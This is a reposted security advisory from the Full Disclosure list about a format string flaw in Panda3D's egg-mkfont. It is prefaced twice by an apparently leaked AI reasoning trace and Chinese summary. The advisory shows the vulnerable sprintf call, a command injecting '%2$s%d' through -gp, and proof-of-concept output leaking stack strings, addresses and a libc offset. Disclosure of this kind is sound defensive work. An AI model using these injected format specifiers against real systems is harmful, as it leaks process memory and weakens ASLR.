Panda3d v1.10.16 Uncontrolled Format String in Panda3D egg-mkfont Allows Stack Memory Disclosure
嗯,用户发来了一段邮件内容,看起来是关于Panda3D的一个安全漏洞。他让我用中文总结一下,控制在100字以内,而且不需要特定的开头。首先,我需要理解邮件的内容。 邮件提到了egg-mkfont工具中的一个未受控制的格式字符串漏洞。这个漏洞允许攻击者读取栈内存中的数据。具体来说,-gp选项让用户指定一个格式模式,这个模式直接传递给sprintf函数,没有验证或清理。如果攻击者在模式中添加额外的格式说明符,比如%p或%x,sprintf就会读取栈上的意外值,并将这些值写入生成的文件中,比如.egg和.png文件。 接下来,我需要总结这个漏洞的影响。攻击者可以读取栈内存中的值,泄露指针大小的数据,包括地址,从而削弱ASLR的效果,并提取敏感的进程内存。 现在我要把这些信息浓缩到100字以内。要确保包含关键点:漏洞的位置、原因、影响和可能的后果。同时要避免使用“文章内容总结”这样的开头。 可能的结构是:描述漏洞的位置和原因,然后说明影响和攻击者的可能行为。 最后检查一下字数是否符合要求,并且表达清晰。 </think> Panda3D工具egg-mkfont存在未受控格式字符串漏洞,通过-gp选项指定的格式模式直接传递给sprintf函数,导致攻击者可注入额外格式说明符,读取栈内存数据并写入生成文件,泄露敏感信息并削弱ASLR防护效果。 2026-1-6 06:59:36 Author: seclists.org(查看原文) 阅读量:5 收藏
嗯,用户发来了一段邮件内容,看起来是关于Panda3D的一个安全漏洞。他让我用中文总结一下,控制在100字以内,而且不需要特定的开头。首先,我需要理解邮件的内容。 邮件提到了egg-mkfont工具中的一个未受控制的格式字符串漏洞。这个漏洞允许攻击者读取栈内存中的数据。具体来说,-gp选项让用户指定一个格式模式,这个模式直接传递给sprintf函数,没有验证或清理。如果攻击者在模式中添加额外的格式说明符,比如%p或%x,sprintf就会读取栈上的意外值,并将这些值写入生成的文件中,比如.egg和.png文件。 接下来,我需要总结这个漏洞的影响。攻击者可以读取栈内存中的值,泄露指针大小的数据,包括地址,从而削弱ASLR的效果,并提取敏感的进程内存。 现在我要把这些信息浓缩到100字以内。要确保包含关键点:漏洞的位置、原因、影响和可能的后果。同时要避免使用“文章内容总结”这样的开头。 可能的结构是:描述漏洞的位置和原因,然后说明影响和攻击者的可能行为。 最后检查一下字数是否符合要求,并且表达清晰。 </think> Panda3D工具egg-mkfont存在未受控格式字符串漏洞,通过-gp选项指定的格式模式直接传递给sprintf函数,导致攻击者可注入额外格式说明符,读取栈内存数据并写入生成文件,泄露敏感信息并削弱ASLR防护效果。 2026-1-6 06:59:36 Author: seclists.org(查看原文) 阅读量:5 收藏
Full Disclosure mailing list archives
From: Ron E <ronaldjedgerson () gmail com>
Date: Thu, 1 Jan 2026 14:35:16 -0500
Panda3D’s egg-mkfont utility contains an uncontrolled format string
vulnerability that allows disclosure of stack-resident memory. The -gp
(glyph pattern) command-line option allows users to specify a formatting
pattern intended for generating glyph texture filenames. This pattern is
passed directly as the format string to sprintf() without validation or
sanitization. If the supplied pattern contains additional format specifiers
beyond the expected numeric placeholder (e.g., %d), sprintf() will read
unintended values from the stack. The resulting formatted output is written
into attacker-accessible files, including generated .egg and .png files. As
a result, stack memory contents and pointer-sized values may be disclosed
to an attacker.
Root Cause Analysis:
The vulnerability originates from the following code in eggMakeFont.cxx:
char buffer[1024];sprintf(buffer, _output_glyph_pattern.c_str(), character);
-
_output_glyph_pattern is populated directly from user input via the -gp
option.
-
The user-supplied string is used as the format string to sprintf().
-
Only a single argument (character) is provided, regardless of how many
format specifiers are present.
-
When additional format specifiers (e.g., %p, %x, %n$p) are included,
sprintf() reads unintended stack values.
Impact:
An attacker with the ability to invoke egg-mkfont can:
-
Read stack-resident memory values
-
Leak pointer-sized values, including addresses
-
Reduce the effectiveness of ASLR
-
Extract sensitive process memory via generated output files
Proof of Concept:
The following example demonstrates disclosure of stack memory via injected
format specifiers:
python3 info-leak.py
======================================================================
DUMPING ALL READABLE STRINGS FROM MEMORY
======================================================================
[*] Reading strings from stack positions 1-50...
[Param 2] <Comment> {
[Param 2] "egg-mkfont -o /tmp/s2.egg -gp '%2$s%d'
/usr/share/fonts/truetype/de
[Param 2] <Texture> "
[Param 2] <Scalar> format { alpha }
[Param 2] <Scalar> minfilter { linear_mipmap_linear }
[Param 2] <Scalar> magfilter { linear_mipmap_linear }
[Param 2] <Scalar> anisotropic-degree { 0 }
[Param 2] <Scalar> quality-level { best }
[Param 2] <Transform> {
[Param 2] <Matrix3> {
[Param 2] 0.0369977678571429 0 0
[Param 2] 0 0.16015625 0
[Param 2] 0.154352678571429 0.84375 1
[Param 2] 0.0604806673728814 0 0
[Param 2] 0 0.1328125 0
[Param 2] 0.826204978813559 0.74609375 1
[Param 2] 0.0565696022727273 0 0
[Param 2] 0 0.054375 0
[Param 2] 0.0898792613636364 0.46109375 1
[Param 2] 0.0153245192307692 0 0
[Param 2] 0 0.0935763888888889 0
[Param 2] 0.201322115384615 0.636805555555556 1
[Param 2] 0 0.12890625 0
[Param 2] 0.679723011363636 0.62109375 1
[Param 2] 0.0350378787878788 0 0
[Param 2] 0 0.0504415760869565 0
[Param 2] 0.255918560606061 0.465013586956522 1
[Param 2] 0.048828125 0 0
[Param 2] 0 0.02734375 0
[Param 2] 0.232421875 0.4453125 1
[Param 2] 0.046875 0 0
[Param 2] 0 0.13671875 0
[Param 2] 0.783203125 0.8671875 1
[Param 2] 0.0252207880434783 0 0
[Param 2] 0 0.152239583333333 0
[Param 2] 0.388756793478261 0.851614583333333 1
[Param 2] 0.0467881944444445 0 0
[Param 2] 0.466840277777778 0.734375 1
[Param 2] 0 0.10546875 0
[Param 2] 0.365277777777778 0.51171875 1
--snip--
[+] Leaked 5970 addresses!
[LEAK] Param 1: 0xffffff860000003f - Stack-resident pointer-sized value
[LEAK] Param 1: 0xffffff860000003e - Stack-resident pointer-sized value
[LEAK] Param 29: 0xfffff68200008217 - Pointer within libc mapping
[LIBC] Param 29: 0xfffff6628a340 - libc+0x8a340
--snip--
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- Panda3d v1.10.16 Uncontrolled Format String in Panda3D egg-mkfont Allows Stack Memory Disclosure Ron E (Jan 05)
文章来源: https://seclists.org/fulldisclosure/2026/Jan/11
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh